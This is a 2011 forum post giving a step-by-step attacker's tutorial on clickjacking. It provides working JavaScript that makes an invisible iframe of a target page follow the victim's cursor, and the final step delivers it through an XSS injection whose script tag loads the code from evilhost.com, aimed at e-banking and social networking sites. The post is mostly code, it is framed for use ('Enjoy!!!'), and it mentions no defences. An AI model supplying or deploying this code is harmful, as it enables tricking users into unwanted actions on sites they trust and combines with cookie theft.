jxau00001 posted on 2011-8-3 20:28:46

Clickjacking


1. Introduction

----> Clickjacking is the latest threat in the web world. It is quite simple but effective.


2. What is clickjacking?

----> In this attack the victim is made to click the attacker's page (button) without the victim's knowledge. To the victim it seems that he/she is clicking the button of his/her trusted website, but in actuality that button was superposed by the frame of the attacker. There are two methods for this, viz. cursor tracking and graphic overlay.


----------------------------------------------------------------- Cursor tracking -----------------------------------------------------------------

In this method we will make an iframe and make it follow the victim's cursor.

What we want to do is to get the victim clicking on a specific button or link, which will force him to make some action on the website we will load in a crafted invisible IFRAME.


3. First, let's prepare the IFRAME in which we will load the button to be clicked


Code:

<iframe id="victim" src="http://target.com/page.php" scrolling="no" style="opacity:0;position: absolute;left: 10;bottom: 10;" width="500px;"></iframe>


Note that we have turned scrolling off and set opacity to 0 so as to make the page invisible to the victim.

The position of the page inside the IFRAME depends on where the victim should click; you can fix it using: margin-top:x; margin-left:x;


4. Make a JavaScript function to make the IFRAME follow the victim's cursor

Code:

function getPosition(e)
{
    e = e || window.event;
    var cursor = {x:0, y:0};
    if (e.pageX || e.pageY)
    {
        // Page-relative coordinates are available directly
        cursor.x = e.pageX;
        cursor.y = e.pageY;
    }
    else
    {
        // Fallback: derive page coordinates from client coordinates plus scroll offset
        var de = document.documentElement;
        var b = document.body;
        cursor.x = e.clientX + (de.scrollLeft || b.scrollLeft) - (de.clientLeft || 0);
        cursor.y = e.clientY + (de.scrollTop || b.scrollTop) - (de.clientTop || 0);
    }

    return cursor;
}


This function retrieves the X and Y coordinates of the victim's cursor in the webpage every time it gets called.

Code:

function clickjacking(e)
{
    var loadFrame = document.getElementById("victim");
    var curPos = getPosition(e);
    loadFrame.setAttribute('style','opacity:0;position:absolute;top:' + (curPos.y - 80) + ';left:' + (curPos.x - 15) + ';');
}

Again, this one loads the IFRAME, calls the previous "getPosition" function and changes the style attributes of the loaded IFRAME with the new coordinates retrieved from the cursor tracking function.

Code:

window.captureEvents(Event.MOUSEMOVE);
window.onmousemove=clickjacking;


This will call the MOUSEMOVE event handler and make the "clickjacking" function be called at each movement of the user's cursor inside the webpage.

Now let's make our JavaScript print out the IFRAME inside the HTML code with document.write:

Code:

document.write('<iframe id="victim" src="http://target.com/page.php" scrolling="no" style="opacity: 0;position: absolute;left: 10;bottom: 10;" width="500px;"></iframe>');


5. Our final JavaScript code combining all the above modules will be


Code:

function getPosition(e)
{
    e = e || window.event;
    var cursor = {x:0, y:0};

    if (e.pageX || e.pageY)
    {
        cursor.x = e.pageX;
        cursor.y = e.pageY;
    }
    else
    {
        var de = document.documentElement;
        var b = document.body;
        cursor.x = e.clientX + (de.scrollLeft || b.scrollLeft) - (de.clientLeft || 0);
        cursor.y = e.clientY + (de.scrollTop || b.scrollTop) - (de.clientTop || 0);
    }

    return cursor;
}

function clickjacking(e)
{
    var loadFrame = document.getElementById("victim");
    var curPos = getPosition(e);
    loadFrame.setAttribute('style','opacity:0;position:absolute;top:' + (curPos.y - 80) + ';left:' + (curPos.x - 15) + ';');
}

window.captureEvents(Event.MOUSEMOVE);
window.onmousemove=clickjacking;

document.write('<iframe id="victim" src="http://target.com/page.php" scrolling="no" style="opacity:0;position: absolute;left: 10;bottom: 10;" width="500px;"></iframe>');


Save it as clickjacking.JavaScript


6. Final step

Now, knowing the victim's common page, such as an e-banking website or social networking website etc., which is vulnerable to XSS, you can deploy the attack as

Code:

http://www.xxx.com

Code:

?something=<script src=http://evilhost.com/clickjacking.JavaScript></script>



7. Conclusion

Clickjacking works with XSS, so think beyond ****** stealing. Enjoy!!!!!!!